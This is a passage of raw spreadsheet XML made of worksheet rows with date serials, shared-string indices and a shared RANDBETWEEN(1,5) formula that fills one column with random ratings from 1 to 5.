        <f t="shared" ca="1" si="402"/>
        <v>5</v>
      </c>
    </row>
    <row r="25776" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25776" s="1">
        <v>42942.098194444443</v>
      </c>
      <c r="C25776" t="s">
        <v>10</v>
      </c>
      <c r="D25776" t="s">
        <v>6</v>
      </c>
      <c r="E25776" t="s">
        <v>23405</v>
      </c>
      <c r="F25776">
        <f t="shared" ca="1" si="402"/>
        <v>1</v>
      </c>
    </row>
    <row r="25777" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25777" s="1">
        <v>42942.089212962965</v>
      </c>
      <c r="C25777" t="s">
        <v>41</v>
      </c>
      <c r="E25777" t="s">
        <v>23406</v>
      </c>
      <c r="F25777">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25778" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25778" s="1">
        <v>42942.079328703701</v>
      </c>
      <c r="C25778" t="s">
        <v>65</v>
      </c>
      <c r="E25778" t="s">
        <v>23407</v>
      </c>
      <c r="F25778">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25779" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25779" s="1">
        <v>42942.060231481482</v>
      </c>
      <c r="C25779" t="s">
        <v>408</v>
      </c>
      <c r="E25779" t="s">
        <v>23408</v>
      </c>
      <c r="F25779">
        <f t="shared" ca="1" si="402"/>
        <v>1</v>
      </c>
    </row>
    <row r="25780" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25780" s="1">
        <v>42941.97314814815</v>
      </c>
      <c r="C25780" t="s">
        <v>140</v>
      </c>
      <c r="D25780" t="s">
        <v>234</v>
      </c>
      <c r="E25780" s="2" t="s">
        <v>23409</v>
      </c>
      <c r="F25780">
        <f t="shared" ca="1" si="402"/>
        <v>4</v>
      </c>
    </row>
    <row r="25781" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25781" s="1">
        <v>42941.876296296294</v>
      </c>
      <c r="C25781" t="s">
        <v>6</v>
      </c>
      <c r="D25781" t="s">
        <v>194</v>
      </c>
      <c r="E25781" s="2" t="s">
        <v>23410</v>
      </c>
      <c r="F25781">
        <f t="shared" ca="1" si="402"/>
        <v>4</v>
      </c>
    </row>
    <row r="25782" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25782" s="1">
        <v>42941.849328703705</v>
      </c>
      <c r="C25782" t="s">
        <v>140</v>
      </c>
      <c r="D25782" t="s">
        <v>847</v>
      </c>
      <c r="E25782" t="s">
        <v>23411</v>
      </c>
      <c r="F25782">
        <f t="shared" ca="1" si="402"/>
        <v>5</v>
      </c>
    </row>
    <row r="25783" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25783" s="1">
        <v>42941.845439814817</v>
      </c>
      <c r="C25783" t="s">
        <v>10</v>
      </c>
      <c r="D25783" t="s">
        <v>713</v>
      </c>
      <c r="E25783" t="s">
        <v>23412</v>
      </c>
      <c r="F25783">
        <f t="shared" ca="1" si="402"/>
        <v>4</v>
      </c>
    </row>
    <row r="25784" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25784" s="1">
        <v>42941.7734837963</v>
      </c>
      <c r="C25784" t="s">
        <v>10</v>
      </c>
      <c r="D25784" t="s">
        <v>6</v>
      </c>
      <c r="E25784" t="s">
        <v>23413</v>
      </c>
      <c r="F25784">
        <f t="shared" ca="1" si="402"/>
        <v>4</v>
      </c>
    </row>
    <row r="25785" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A25785" s="1">
        <v>42941.767430555556</v>
      </c>
      <c r="C25785" t="s">
        <v>10</v>
      </c>
      <c r="D25785" t="s">
        <v>6</v>
      </c>
      <c r="E25785" s="2" t="s">
        <v>23414</v>
      </c>
      <c r="F25785">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25786" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25786" s="1">
        <v>42941.745208333334</v>
      </c>
      <c r="C25786" t="s">
        <v>10</v>
      </c>
      <c r="D25786" t="s">
        <v>6</v>
      </c>
      <c r="E25786" t="s">
        <v>23415</v>
      </c>
      <c r="F25786">
        <f t="shared" ca="1" si="402"/>
        <v>2</v>
      </c>
    </row>
    <row r="25787" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25787" s="1">
        <v>42941.729178240741</v>
      </c>
      <c r="C25787" t="s">
        <v>10</v>
      </c>
      <c r="D25787" t="s">
        <v>41</v>
      </c>
      <c r="E25787" t="s">
        <v>23416</v>
      </c>
      <c r="F25787">
        <f t="shared" ca="1" si="402"/>
        <v>2</v>
      </c>
    </row>
    <row r="25788" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A25788" s="1">
        <v>42941.710092592592</v>
      </c>
      <c r="C25788" t="s">
        <v>10</v>
      </c>
      <c r="D25788" t="s">
        <v>229</v>
      </c>
      <c r="E25788" s="2" t="s">
        <v>23417</v>
      </c>
      <c r="F25788">
        <f t="shared" ca="1" si="402"/>
        <v>3</v>
      </c>
    </row>
    <row r="25789" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25789" s="1">
        <v>42941.707488425927</v>
      </c>
      <c r="C25789" t="s">
        <v>10</v>
      </c>
      <c r="D25789" t="s">
        <v>163</v>
      </c>
      <c r="E25789" t="s">
        <v>23418</v>
      </c>
      <c r="F25789">
        <f t="shared" ca="1" si="402"/>
        <v>5</v>
      </c>
    </row>
    <row r="25790" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A25790" s="1">
        <v>42941.677129629628</v>
      </c>
      <c r="C25790" t="s">
        <v>10</v>
      </c>
      <c r="D25790" t="s">
        <v>23</v>
      </c>
      <c r="E25790" s="2" t="s">
        <v>23419</v>
      </c>
      <c r="F25790">
        <f t="shared" ca="1" si="402"/>
        <v>5</v>
      </c>
    </row>
    <row r="25791" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25791" s="1">
        <v>42941.674270833333</v>
      </c>
      <c r="C25791" t="s">
        <v>10</v>
      </c>
      <c r="D25791" t="s">
        <v>112</v>
      </c>
      <c r="E25791" s="2" t="s">
        <v>23420</v>
      </c>
      <c r="F25791">
        <f t="shared" ca="1" si="402"/>
        <v>1</v>
      </c>
    </row>
    <row r="25792" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25792" s="1">
        <v>42941.633414351854</v>
      </c>
      <c r="C25792" t="s">
        <v>10</v>
      </c>
      <c r="D25792" t="s">
        <v>6</v>
      </c>
      <c r="E25792" t="s">
        <v>23421</v>
      </c>
      <c r="F25792">
        <f t="shared" ca="1" si="402"/>
        <v>2</v>
      </c>
    </row>
    <row r="25793" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25793" s="1">
        <v>42941.626099537039</v>
      </c>
      <c r="C25793" t="s">
        <v>10</v>
      </c>
      <c r="D25793" t="s">
        <v>112</v>
      </c>
      <c r="E25793" t="s">
        <v>23422</v>
      </c>
      <c r="F25793">
        <f t="shared" ca="1" si="402"/>
        <v>5</v>
      </c>
    </row>
    <row r="25794" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A25794" s="1">
        <v>42941.583298611113</v>
      </c>
      <c r="C25794" t="s">
        <v>16</v>
      </c>
      <c r="E25794" s="2" t="s">
        <v>23423</v>
      </c>
      <c r="F25794">
        <f t="shared" ref="F25794:F25857" ca="1" si="403">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="25795" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25795" s="1">
        <v>42941.570208333331</v>
      </c>
      <c r="C25795" t="s">
        <v>10</v>
      </c>
      <c r="D25795" t="s">
        <v>41</v>
      </c>
      <c r="E25795" t="s">
        <v>23424</v>
      </c>
      <c r="F25795">
        <f t="shared" ca="1" si="403"/>
        <v>3</v>
      </c>
    </row>
    <row r="25796" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25796" s="1">
        <v>42941.538090277776</v>
      </c>
      <c r="C25796" t="s">
        <v>721</v>
      </c>
      <c r="E25796" t="s">
        <v>23425</v>
      </c>
      <c r="F25796">
        <f t="shared" ca="1" si="403"/>
        <v>2</v>
      </c>
    </row>
    <row r="25797" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25797" s="1">
        <v>42941.517824074072</v>
      </c>
      <c r="C25797" t="s">
        <v>10</v>
      </c>
      <c r="D25797" t="s">
        <v>163</v>
      </c>
      <c r="E25797" t="s">
        <v>23426</v>
      </c>
      <c r="F25797">
        <f t="shared" ca="1" si="403"/>
        <v>3</v>
      </c>
    </row>
    <row r="25798" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25798" s="1">
        <v>42941.50068287037</v>
      </c>
      <c r="C25798" t="s">
        <v>48</v>
      </c>
      <c r="E25798" s="2" t="s">
        <v>23427</v>
      </c>
      <c r="F25798">
        <f t="shared" ca="1" si="403"/>
        <v>2</v>
      </c>
    </row>
    <row r="25799" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25799" s="1">
        <v>42941.495092592595</v>
      </c>
      <c r="C25799" t="s">
        <v>10</v>
      </c>
      <c r="D25799" t="s">
        <v>251</v>
      </c>
      <c r="E25799" s="2" t="s">
        <v>23428</v>
      </c>
      <c r="F25799">
        <f t="shared" ca="1" si="403"/>
        <v>4</v>
      </c>
    </row>
    <row r="25800" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25800" s="1">
        <v>42941.492083333331</v>
      </c>
      <c r="C25800" t="s">
        <v>6</v>
      </c>
      <c r="D25800" t="s">
        <v>25</v>
      </c>
      <c r="E25800" s="2" t="s">
        <v>23429</v>
      </c>
      <c r="F25800">
        <f t="shared" ca="1" si="403"/>
        <v>3</v>
      </c>
    </row>
    <row r="25801" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25801" s="1">
        <v>42941.490023148152</v>
      </c>
      <c r="C25801" t="s">
        <v>6</v>
      </c>
      <c r="D25801" t="s">
        <v>67</v>
      </c>
      <c r="E25801" s="2" t="s">
        <v>23430</v>
      </c>
      <c r="F25801">
        <f t="shared" ca="1" si="403"/>
        <v>1</v>
      </c>
    </row>
    <row r="25802" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25802" s="1">
        <v>42941.477060185185</v>
      </c>
      <c r="C25802" t="s">
        <v>166</v>
      </c>
      <c r="E25802" t="s">
        <v>23431</v>
      </c>
      <c r="F25802">
        <f t="shared" ca="1" si="403"/>
        <v>3</v>
      </c>
    </row>
    <row r="25803" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25803" s="1">
        <v>42941.457939814813</v>
      </c>
      <c r="C25803" t="s">
        <v>6</v>
      </c>
      <c r="D25803" t="s">
        <v>2139</v>
      </c>
      <c r="E25803" s="2" t="s">
        <v>23432</v>
      </c>
      <c r="F25803">
        <f t="shared" ca="1" si="403"/>
        <v>1</v>
      </c>
    </row>
    <row r="25804" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25804" s="1">
        <v>42941.44939814815</v>
      </c>
      <c r="C25804" t="s">
        <v>10</v>
      </c>
      <c r="D25804" t="s">
        <v>178</v>
      </c>
      <c r="E25804" t="s">
        <v>23433</v>
      </c>
      <c r="F25804">
        <f t="shared" ca="1" si="403"/>
        <v>4</v>
      </c>
    </row>
    <row r="25805" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25805" s="1">
        <v>42941.417719907404</v>
      </c>
      <c r="C25805" t="s">
        <v>10</v>
      </c>
      <c r="D25805" t="s">
        <v>271</v>
      </c>
      <c r="E25805" s="2" t="s">
        <v>23434</v>
      </c>
      <c r="F25805">
        <f t="shared" ca="1" si="403"/>
        <v>3</v>
      </c>
    </row>
    <row r="25806" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A25806" s="1">
        <v>42941.398796296293</v>
      </c>
      <c r="C25806" t="s">
        <v>41</v>
      </c>
      <c r="E25806" s="2" t="s">
        <v>23435</v>
      </c>
      <c r="F25806">
        <f t="shared" ca="1" si="403"/>
        <v>5</v>
      </c>
    </row>
    <row r="25807" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A25807" s="1">
        <v>42941.396249999998</v>
      </c>
      <c r="C25807" t="s">
        <v>16</v>
      </c>
      <c r="E25807" s="2" t="s">
        <v>23436</v>
      </c>
      <c r="F25807">
        <f t="shared" ca="1" si="403"/>
        <v>5</v>
      </c>
    </row>
    <row r="25808" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A25808" s="1">
        <v>42941.387523148151</v>
      </c>
      <c r="C25808" t="s">
        <v>6</v>
      </c>
      <c r="D25808" t="s">
        <v>25</v>
      </c>
      <c r="E25808" s="2" t="s">
        <v>23437</v>
      </c>
      <c r="F25808">
        <f t="shared" ca="1" si="403"/>
        <v>3</v>
      </c>
    </row>
    <row r="25809" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25809" s="1">
        <v>42941.385960648149</v>
      </c>
      <c r="C25809" t="s">
        <v>461</v>
      </c>
      <c r="E25809" t="s">
        <v>23438</v>
      </c>
      <c r="F25809">
        <f t="shared" ca="1" si="403"/>
        <v>2</v>
      </c>
    </row>
    <row r="25810" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25810" s="1">
        <v>42941.37190972222</v>
      </c>
      <c r="C25810" t="s">
        <v>6</v>
      </c>
      <c r="D25810" t="s">
        <v>25</v>
      </c>
      <c r="E25810" t="s">
        <v>23439</v>
      </c>
      <c r="F25810">
        <f t="shared" ca="1" si="403"/>
        <v>1</v>
      </c>
    </row>
    <row r="25811" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25811" s="1">
        <v>42941.348599537036</v>
      </c>
      <c r="C25811" t="s">
        <v>10</v>
      </c>
      <c r="D25811" t="s">
        <v>36</v>
      </c>
      <c r="E25811" t="s">
        <v>23440</v>
      </c>
      <c r="F25811">
        <f t="shared" ca="1" si="403"/>
        <v>3</v>
      </c>
    </row>
    <row r="25812" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25812" s="1">
        <v>42941.340011574073</v>
      </c>
      <c r="C25812" t="s">
        <v>189</v>
      </c>
      <c r="E25812" t="s">
        <v>23441</v>
      </c>
      <c r="F25812">
        <f t="shared" ca="1" si="403"/>
        <v>2</v>
      </c>
    </row>
    <row r="25813" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25813" s="1">
        <v>42941.309537037036</v>
      </c>
      <c r="C25813" t="s">
        <v>41</v>
      </c>
      <c r="E25813" t="s">
        <v>23442</v>
      </c>
      <c r="F25813">
        <f t="shared" ca="1" si="403"/>
        <v>3</v>
      </c>
    </row>
    <row r="25814" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25814" s="1">
        <v>42941.297002314815</v>
      </c>
      <c r="C25814" t="s">
        <v>41</v>
      </c>
      <c r="E25814" t="s">
        <v>23443</v>
      </c>
      <c r="F25814">
        <f t="shared" ca="1" si="403"/>
        <v>3</v>
      </c>
    </row>
    <row r="25815" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A25815" s="1">
        <v>42941.291805555556</v>
      </c>
      <c r="C25815" t="s">
        <v>69</v>
      </c>
      <c r="E25815" s="2" t="s">
        <v>23444</v>
      </c>
      <c r="F25815">
        <f t="shared" ca="1" si="403"/>
        <v>4</v>
      </c>
    </row>
    <row r="25816" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25816" s="1">
        <v>42941.290266203701</v>
      </c>
      <c r="C25816" t="s">
        <v>48</v>
      </c>
      <c r="E25816" s="2" t="s">
        <v>23445</v>
      </c>
      <c r="F25816">
        <f t="shared" ca="1" si="403"/>
        <v>4</v>
      </c>
    </row>
    <row r="25817" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A25817" s="1">
        <v>42941.243657407409</v>
      </c>
      <c r="C25817" t="s">
        <v>65</v>
      </c>
      <c r="E25817" s="2" t="s">
        <v>23446</v>
      </c>
      <c r="F25817">
        <f t="shared" ca="1" si="403"/>
        <v>5</v>
      </c>
    </row>
    <row r="25818" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25818" s="1">
        <v>42941.205949074072</v>
      </c>
      <c r="C25818" t="s">
        <v>10</v>
      </c>
      <c r="D25818" t="s">
        <v>290</v>
      </c>
      <c r="E25818" s="2" t="s">
        <v>23447</v>
      </c>
      <c r="F25818">
        <f t="shared" ca="1" si="403"/>
        <v>2</v>
      </c>
    </row>
    <row r="25819" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25819" s="1">
        <v>42941.202314814815</v>
      </c>
      <c r="C25819" t="s">
        <v>60</v>
      </c>
      <c r="E25819" t="s">
        <v>23448</v>
      </c>
      <c r="F25819">
        <f t="shared" ca="1" si="403"/>
        <v>1</v>
      </c>
    </row>
    <row r="25820" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25820" s="1">
        <v>42941.185162037036</v>
      </c>
      <c r="C25820" t="s">
        <v>65</v>
      </c>
      <c r="E25820" t="s">
        <v>23449</v>
      </c>
      <c r="F25820">
        <f t="shared" ca="1" si="403"/>
        <v>2</v>
      </c>
    </row>
    <row r="25821" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A25821" s="1">
        <v>42941.18005787037</v>
      </c>
      <c r="C25821" t="s">
        <v>71</v>
      </c>
      <c r="E25821" s="2" t="s">
        <v>23450</v>
      </c>
      <c r="F25821">
        <f t="shared" ca="1" si="403"/>
        <v>1</v>
      </c>
    </row>
    <row r="25822" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A25822" s="1">
        <v>42941.168935185182</v>
      </c>
      <c r="C25822" t="s">
        <v>103</v>
      </c>
      <c r="E25822" s="2" t="s">
        <v>23451</v>
      </c>
      <c r="F25822">
        <f t="shared" ca="1" si="403"/>
        <v>4</v>
      </c>
    </row>
    <row r="25823" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25823" s="1">
        <v>42941.148981481485</v>
      </c>
      <c r="C25823" t="s">
        <v>41</v>
      </c>
      <c r="E25823" t="s">
        <v>23452</v>
      </c>
      <c r="F25823">
        <f t="shared" ca="1" si="403"/>
        <v>3</v>
      </c>
    </row>
    <row r="25824" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A25824" s="1">
        <v>42941.142916666664</v>
      </c>
      <c r="C25824" t="s">
        <v>10</v>
      </c>
      <c r="D25824" t="s">
        <v>36</v>
      </c>
      <c r="E25824" s="2" t="s">
        <v>23453</v>
      </c>
      <c r="F25824">
        <f t="shared" ca="1" si="403"/>
        <v>4</v>
      </c>
    </row>
    <row r="25825" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25825" s="1">
        <v>42941.062349537038</v>
      </c>
      <c r="C25825" t="s">
        <v>229</v>
      </c>
      <c r="E25825" t="s">
        <v>23454</v>
      </c>
      <c r="F25825">
        <f t="shared" ca="1" si="403"/>
        <v>1</v>
      </c>
    </row>
    <row r="25826" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25826" s="1">
        <v>42941.045300925929</v>
      </c>
      <c r="C25826" t="s">
        <v>229</v>
      </c>
      <c r="E25826" t="s">
        <v>23455</v>
      </c>
      <c r="F25826">
        <f t="shared" ca="1" si="403"/>
        <v>4</v>
      </c>
    </row>
    <row r="25827" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25827" s="1">
        <v>42940.923321759263</v>
      </c>
      <c r="C25827" t="s">
        <v>140</v>
      </c>
      <c r="D25827" t="s">
        <v>312</v>
      </c>
      <c r="E25827" t="s">
        <v>23456</v>
      </c>
      <c r="F25827">
        <f t="shared" ca="1" si="403"/>
        <v>2</v>
      </c>
    </row>
    <row r="25828" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25828" s="1">
        <v>42940.907939814817</v>
      </c>
      <c r="C25828" t="s">
        <v>10</v>
      </c>
      <c r="D25828" t="s">
        <v>6</v>
      </c>
      <c r="E25828" t="s">
        <v>23457</v>
      </c>
      <c r="F25828">
        <f t="shared" ca="1" si="403"/>
        <v>1</v>
      </c>
    </row>
    <row r="25829" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A25829" s="1">
        <v>42940.897141203706</v>
      </c>
      <c r="C25829" t="s">
        <v>319</v>
      </c>
      <c r="E25829" s="2" t="s">
        <v>23458</v>
      </c>
      <c r="F25829">
        <f t="shared" ca="1" si="403"/>
        <v>4</v>
      </c>
    </row>
    <row r="25830" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25830" s="1">
        <v>42940.885682870372</v>
      </c>
      <c r="C25830" t="s">
        <v>73</v>
      </c>
      <c r="E25830" t="s">
        <v>23459</v>
      </c>
      <c r="F25830">
        <f t="shared" ca="1" si="403"/>
        <v>5</v>
      </c>
    </row>
    <row r="25831" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25831" s="1">
        <v>42940.864560185182</v>
      </c>
      <c r="C25831" t="s">
        <v>10</v>
      </c>
      <c r="D25831" t="s">
        <v>6</v>
      </c>
      <c r="E25831" t="s">
        <v>23460</v>
      </c>
      <c r="F25831">
        <f t="shared" ca="1" si="403"/>
        <v>4</v>
      </c>
    </row>
    <row r="25832" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25832" s="1">
        <v>42940.839479166665</v>
      </c>
      <c r="C25832" t="s">
        <v>45</v>
      </c>
      <c r="E25832" t="s">
        <v>23461</v>
      </c>
      <c r="F25832">
        <f t="shared" ca="1" si="403"/>
        <v>4</v>
      </c>
    </row>
    <row r="25833" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25833" s="1">
        <v>42940.82953703704</v>
      </c>
      <c r="C25833" t="s">
        <v>10</v>
      </c>
      <c r="D25833" t="s">
        <v>11</v>
      </c>
      <c r="E25833" t="s">
        <v>23462</v>
      </c>
      <c r="F25833">
        <f t="shared" ca="1" si="403"/>
        <v>4</v>
      </c>
    </row>
    <row r="25834" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25834" s="1">
        <v>42940.815891203703</v>
      </c>
      <c r="C25834" t="s">
        <v>10</v>
      </c>
      <c r="D25834" t="s">
        <v>94</v>
      </c>
      <c r="E25834" t="s">
        <v>23463</v>
      </c>
      <c r="F25834">
        <f t="shared" ca="1" si="403"/>
        <v>2</v>
      </c>
    </row>
    <row r="25835" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25835" s="1">
        <v>42940.756585648145</v>
      </c>
      <c r="C25835" t="s">
        <v>140</v>
      </c>
      <c r="D25835" t="s">
        <v>141</v>
      </c>
      <c r="E25835" t="s">
        <v>23464</v>
      </c>
      <c r="F25835">
        <f t="shared" ca="1" si="403"/>
        <v>1</v>
      </c>
    </row>
    <row r="25836" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25836" s="1">
        <v>42940.726435185185</v>
      </c>
      <c r="C25836" t="s">
        <v>48</v>
      </c>
      <c r="E25836" t="s">
        <v>23465</v>
      </c>
      <c r="F25836">
        <f t="shared" ca="1" si="403"/>
        <v>5</v>
      </c>
    </row>
    <row r="25837" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25837" s="1">
        <v>42940.704710648148</v>
      </c>
      <c r="C25837" t="s">
        <v>144</v>
      </c>
      <c r="E25837" t="s">
        <v>23466</v>
      </c>
      <c r="F25837">
        <f t="shared" ca="1" si="403"/>
        <v>5</v>
      </c>
    </row>
    <row r="25838" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25838" s="1">
        <v>42940.692395833335</v>
      </c>
      <c r="C25838" t="s">
        <v>10</v>
      </c>
      <c r="D25838" t="s">
        <v>6</v>
      </c>
      <c r="E25838" t="s">
        <v>23467</v>
      </c>
      <c r="F25838">
        <f t="shared" ca="1" si="403"/>
        <v>3</v>
      </c>
    </row>
    <row r="25839" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25839" s="1">
        <v>42940.673449074071</v>
      </c>
      <c r="C25839" t="s">
        <v>10</v>
      </c>
      <c r="D25839" t="s">
        <v>1036</v>
      </c>
      <c r="E25839" t="s">
        <v>23468</v>
      </c>
      <c r="F25839">
        <f t="shared" ca="1" si="403"/>
        <v>5</v>
      </c>
    </row>
    <row r="25840" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A25840" s="1">
        <v>42940.654189814813</v>
      </c>
      <c r="C25840" t="s">
        <v>10</v>
      </c>
      <c r="D25840" t="s">
        <v>163</v>
      </c>
      <c r="E25840" s="2" t="s">
        <v>23469</v>
      </c>
      <c r="F25840">
        <f t="shared" ca="1" si="403"/>
        <v>5</v>
      </c>
    </row>
    <row r="25841" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25841" s="1">
        <v>42940.637326388889</v>
      </c>
      <c r="C25841" t="s">
        <v>10</v>
      </c>
      <c r="D25841" t="s">
        <v>271</v>
      </c>
      <c r="E25841" s="2" t="s">
        <v>23470</v>
      </c>
      <c r="F25841">
        <f t="shared" ca="1" si="403"/>
        <v>4</v>
      </c>
    </row>
    <row r="25842" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25842" s="1">
        <v>42940.597037037034</v>
      </c>
      <c r="C25842" t="s">
        <v>260</v>
      </c>
      <c r="E25842" t="s">
        <v>23471</v>
      </c>
      <c r="F25842">
        <f t="shared" ca="1" si="403"/>
        <v>3</v>
      </c>
    </row>
    <row r="25843" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A25843" s="1">
        <v>42940.583564814813</v>
      </c>
      <c r="C25843" t="s">
        <v>10</v>
      </c>
      <c r="D25843" t="s">
        <v>6</v>
      </c>
      <c r="E25843" s="2" t="s">
        <v>23472</v>
      </c>
      <c r="F25843">
        <f t="shared" ca="1" si="403"/>
        <v>2</v>
      </c>
    </row>
    <row r="25844" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25844" s="1">
        <v>42940.58353009259</v>
      </c>
      <c r="C25844" t="s">
        <v>6</v>
      </c>
      <c r="D25844" t="s">
        <v>194</v>
      </c>
      <c r="E25844" t="s">
        <v>23473</v>
      </c>
      <c r="F25844">
        <f t="shared" ca="1" si="403"/>
        <v>3</v>
      </c>
    </row>
    <row r="25845" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A25845" s="1">
        <v>42940.581863425927</v>
      </c>
      <c r="C25845" t="s">
        <v>16</v>
      </c>
      <c r="E25845" s="2" t="s">
        <v>23474</v>
      </c>
      <c r="F25845">
        <f t="shared" ca="1" si="403"/>
        <v>4</v>
      </c>
    </row>
    <row r="25846" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25846" s="1">
        <v>42940.576296296298</v>
      </c>
      <c r="C25846" t="s">
        <v>10</v>
      </c>
      <c r="D25846" t="s">
        <v>107</v>
      </c>
      <c r="E25846" t="s">
        <v>23475</v>
      </c>
      <c r="F25846">
        <f t="shared" ca="1" si="403"/>
        <v>3</v>
      </c>
    </row>
    <row r="25847" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25847" s="1">
        <v>42940.56559027778</v>
      </c>
      <c r="C25847" t="s">
        <v>10</v>
      </c>
      <c r="D25847" t="s">
        <v>52</v>
      </c>
      <c r="E25847" t="s">
        <v>23476</v>
      </c>
      <c r="F25847">
        <f t="shared" ca="1" si="403"/>
        <v>5</v>
      </c>
    </row>
    <row r="25848" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A25848" s="1">
        <v>42940.561296296299</v>
      </c>
      <c r="C25848" t="s">
        <v>10</v>
      </c>
      <c r="D25848" t="s">
        <v>6</v>
      </c>
      <c r="E25848" s="2" t="s">
        <v>23477</v>
      </c>
      <c r="F25848">
        <f t="shared" ca="1" si="403"/>
        <v>2</v>
      </c>
    </row>
    <row r="25849" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25849" s="1">
        <v>42940.546898148146</v>
      </c>
      <c r="C25849" t="s">
        <v>10</v>
      </c>
      <c r="D25849" t="s">
        <v>192</v>
      </c>
      <c r="E25849" t="s">
        <v>23478</v>
      </c>
      <c r="F25849">
        <f t="shared" ca="1" si="403"/>
        <v>4</v>
      </c>
    </row>
    <row r="25850" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25850" s="1">
        <v>42940.529537037037</v>
      </c>
      <c r="C25850" t="s">
        <v>10</v>
      </c>
      <c r="D25850" t="s">
        <v>23</v>
      </c>
      <c r="E25850" t="s">
        <v>23479</v>
      </c>
      <c r="F25850">
        <f t="shared" ca="1" si="403"/>
        <v>3</v>
      </c>
    </row>
    <row r="25851" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A25851" s="1">
        <v>42940.526076388887</v>
      </c>
      <c r="C25851" t="s">
        <v>344</v>
      </c>
      <c r="E25851" s="2" t="s">
        <v>23480</v>
      </c>
      <c r="F25851">
        <f t="shared" ca="1" si="403"/>
        <v>3</v>
      </c>
    </row>
    <row r="25852" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25852" s="1">
        <v>42940.498935185184</v>
      </c>
      <c r="C25852" t="s">
        <v>10</v>
      </c>
      <c r="D25852" t="s">
        <v>494</v>
      </c>
      <c r="E25852" t="s">
        <v>23481</v>
      </c>
      <c r="F25852">
        <f t="shared" ca="1" si="403"/>
        <v>5</v>
      </c>
    </row>
    <row r="25853" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A25853" s="1">
        <v>42940.494467592594</v>
      </c>
      <c r="C25853" t="s">
        <v>173</v>
      </c>
      <c r="E25853" t="s">
        <v>23482</v>
      </c>
      <c r="F25853">
        <f t="shared" ca="1" si="403"/>
        <v>1</v>
      </c>
    </row>
    <row r="25854" spans="1:6" x14ac:dyDescent="0.25">
